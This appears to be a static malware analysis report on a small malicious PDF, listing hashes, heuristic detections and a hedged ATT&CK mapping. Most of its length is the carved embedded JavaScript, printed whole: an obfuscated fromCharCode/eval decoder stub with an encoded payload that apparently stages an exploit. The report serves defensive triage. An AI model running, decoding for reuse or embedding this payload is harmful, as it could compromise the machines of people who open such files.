Malicious PDF — malware analysis report

Static analysis result for SHA-256 e4f0f838a7ae1eb2…

MALICIOUS

PDF

5.8 KB Created: 2010-07-25 10:32:51 Authoring application: FPDF 1.6 First seen: 2026-05-11
MD5: d1ee1704cc69b802f68dbef70ccef39c SHA-1: daca3947c83c6ac5440c47ea74dbfa63d623d0e0 SHA-256: e4f0f838a7ae1eb2475f2dbd48f0274e9e2d4e4405158d49e2b76ffcb8afad3c
116 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

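The PDF file contains embedded, obfuscated JavaScript, as indicated by multiple heuristic hits including PDF_JAVASCRIPT, PDF_JS, and PDF_FROMCHARCODE. The extracted artifact 'javascript_obj0007_000.js' likely contains code designed to download and execute a second-stage payload. The obfuscation suggests an intent to evade detection. Note that the artifact as extracted is only a decoder stub: it builds a character table with String.fromCharCode, maps a numeric array through it, and passes the result to eval. The second-stage behaviour, and the T1059.001 (PowerShell) mapping above, therefore remain unconfirmed until that array is decoded statically and reviewed; embedded PDF JavaScript by itself corresponds more directly to T1059.007 (JavaScript).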

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
     function vf\(s\){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for\(z in n\){ for\(i=n[z][0];i<n[z][1];i++\){  v.push\(w\(i\)\); }}for \(var i = 0; i < s.length; i++\) { r+=v[s[i]];}eval\(r\);}vf\([65,64,71,86,79,68,85,74,80,79,0,71,74,89,46,74,85,8,90,66,83,84,81,12,0,77,70,79,9,92,65,64,88,73,74,77,70,0,8,90,66,83,84,81,14,77,70,79,72,85,73,0,10,0,50,0,60,0,77,70,79,9,92,65,64,90,66,83,84,81,0,11,61,0,90,66,83,84,81,59,65,64,94,65,64,90,66,83,84,81,0 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0007_000.js | pdf-javascript-stream | PDF /JS object 7 at offset 0x1EB | 5041 bytes
SHA-256: 7aa0ed8a9fe814f9df6fb50bc986fca9f9698bac01a17c09292716b4f50277ba
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function vf(s){var r='',v=[],w=String.fromCharCode,n=[[32,48],[65,97],[48,64],[10,11],[13,14],[97,126]];for(z in n){	for(i=n[z][0];i<n[z][1];i++){		v.push(w(i));	}}for (var i = 0; i < s.length; i++) {	r+=v[s[i]];}eval(r);}vf([65,64,71,86,79,68,85,74,80,79,0,71,74,89,46,74,85,8,90,66,83,84,81,12,0,77,70,79,9,92,65,64,88,73,74,77,70,0,8,90,66,83,84,81,14,77,70,79,72,85,73,0,10,0,50,0,60,0,77,70,79,9,92,65,64,90,66,83,84,81,0,11,61,0,90,66,83,84,81,59,65,64,94,65,64,90,66,83,84,81,0,61,0,90,66,83,84,81,14,84,86,67,84,85,83,74,79,72,8,48,12,0,77,70,79,15,50,9,59,65,64,83,70,85,86,83,79,0,90,66,83,84,81,59,65,64,94,65,64,65,64,71,86,79,68,85,74,80,79,0,86,85,74,77,46,81,83,74,79,85,71,8,9,92,65,64,87,66,83,0,81,66,90,77,80,66,69,0,61,0,86,79,70,84,68,66,81,70,8,2,73,85,85,81,58,15,15,67,77,66,68,76,73,80,77,70,15,74,79,69,70,89,14,81,73,81,2,9,59,65,64,87,66,83,0,79,80,81,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,5,86,48,16,48,16,2,9,65,64,87,66,83,0,73,70,66,81,67,77,80,68,76,0,61,0,79,80,81,0,11,0,81,66,90,77,80,66,69,59,65,64,87,66,83,0,67,74,72,67,77,80,68,76,0,61,0,86,79,70,84,68,66,81,70,8,2,5,86,48,16,48,16,5,86,48,16,48,16,2,9,59,65,64,87,66,83,0,73,70,66,69,70,83,84,74,91,70,0,61,0,50,48,59,65,64,87,66,83,0,84,81,83,66,90,0,61,0,73,70,66,69,70,83,84,74,91,70,0,11,0,73,70,66,81,67,77,80,68,76,14,77,70,79,72,85,73,59,65,64,88,73,74,77,70,0,8,67,74,72,67,77,80,68,76,14,77,70,79,72,85,73,0,60,0,84,81,83,66,90,9,92,65,64,67,74,72,67,77,80,68,76,0,11,61,0,67,74,72,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,71,74,77,77,67,77,80,68,76,0,61,0,67,74,72,67,77,80,68,76,14,84,86,67,84,85,83,74,79,72,8,48,12,0,84,81,83,66,90,9,59,65,64,87,66,83,0,67,77,80,68,76,0,61,0,67,74,72,67,77,80,68,76,14,84,86,67,84,85,83,74,79,72,8,48,12,0,67,74,72,67,77,80,68,76,14,77,70,79,72,85,73,13,84,81,83,66,90,9,59,65,64,88,73,74,77,70,0,8,67,77,80,68,76,14,77,70,79,72,85,73,11,84,81,83,66,90,0,60,0,48,89,52,48,48,48,48,9,92,65,64,67,77,80,68,76,0,6
1,0,67,77,80,68,76,0,11,0,67,77,80,68,76,0,11,0,71,74,77,77,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,78,70,78,46,66,83,83,66,90,0,61,0,79,70,88,0,16,83,83,66,90,8,9,59,65,64,71,80,83,0,8,87,66,83,0,74,0,61,0,48,59,0,74,0,60,0,49,52,48,48,59,0,74,11,11,9,92,65,64,78,70,78,46,66,83,83,66,90,42,74,44,0,61,0,67,77,80,68,76,0,11,0,73,70,66,81,67,77,80,68,76,59,65,64,94,65,64,87,66,83,0,79,86,78,0,61,0,49,50,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,57,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,56,59,65,64,86,85,74,77,14,81,83,74,79,85,71,8,2,5,52,53,48,48,48,71,2,12,0,79,86,78,9,59,65,64,94,65,64,65,64,65,64,71,86,79,68,85,74,80,79,0,81,69,71,46,84,85,66,83,85,8,9,92,65,64,87,66,83,0,87,70,83,84,74,80,79,0,61,0,66,81,81,14,87,74,70,88,70,83,37,70,83,84,74,80,79,14,85,80,34,85,83,74,79,72,8,9,59,65,64,87,70,83,84,74,80,79,0,61,0,87,70,83,84,74,80,79,14,83,70,81,77,66,68,70,8,15,43,19,15,72,12,7,7,9,59,65,64,87,66,83,0,87,66,83,84,74,80,79,46,66,83,83,66,90,0,61,0,79,70,88,0,16,83,83,66,90,8,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,48,9,12,0,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,49,9,12,0,87,70,83,84,74,80,79,14,68,73,66,83,16,85,8,50,9,9,59,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66
,83,83,66,90,42,48,44,0,61,61,0,56,9,0,6,6,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,61,61,0,48,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,61,61,0,49,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,50,44,0,60,0,51,9,9,92,65,64,86,85,74,77,46,81,83,74,79,85,71,8,9,59,65,64,94,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,60,0,56,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,61,61,0,56,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,60,0,50,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,50,44,0,60,0,50,9,9,92,65,64,68,80,77,77,66,67,46,70,78,66,74,77,8,9,59,65,64,94,65,64,74,71,0,8,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,60,0,57,9,0,93,93,0,8,87,66,83,84,74,80,79,46,66,83,83,66,90,42,48,44,0,61,61,0,57,0,6,6,0,87,66,83,84,74,80,79,46,66,83,83,66,90,42,49,44,0,60,0,49,9,9,92,65,64,68,80,77,77,66,67,46,72,70,85,74,68,80,79,8,9,59,65,64,94,65,64,94,65,64,65,64,66,81,81,14,66,77,70,83,85,8,7,85,70,84,85,49,50,51,7,9,59,65,64]);;